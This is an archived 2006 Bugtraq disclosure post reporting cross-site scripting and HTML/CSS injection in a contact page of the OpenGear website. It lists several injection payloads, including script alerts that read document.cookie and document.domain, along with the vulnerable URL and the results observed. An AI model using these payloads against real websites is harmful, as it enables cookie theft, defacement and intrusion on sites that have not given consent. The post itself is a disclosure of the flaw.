| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 24 Apr 2006 14:50:40 -0000
From: Aditya@...aeye.Org
To: bugtraq@...urityfocus.com
Subject: XSS Bug in OpenGear Server Website
0x0*] Advisory
==============
Web Penetrated By:- Aditya@...aeye.Org
=======================================
Hit :- Site Manipulation.
====
Vulnerability :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus :- Windows IE 6.0
==============
Injections :-
========== 0x01] ' && ""
0x02] <script>Javascript:alert("Penetrated");</script>
0x03] <p>Penetrated</p>
0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
0x05] '';!--"<CSS_Check>=&{()}
0x06] '<script>javascript:alert(document.cookie);</script>
0x07] '<script>javascript:alert(document.domain);</script>
Result:-Opengear.com with alert injection.
0x01] document.domain Injection Yields --> Opengear.com
0x02] document.cookie Injection Yields --> Empty string
0x03] Remote Linking Is Possible <a href=""></a> Working.
0x04] The OutBound Attack Is Also Definitive.
Site :- http://www.Opengear.com
=======
Vulnerable Link:
================ http://www.opengear.com/cm4000_nwcontact.html
Explanation :-
=============
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.
=========================================================
Powered by blists - more mailing lists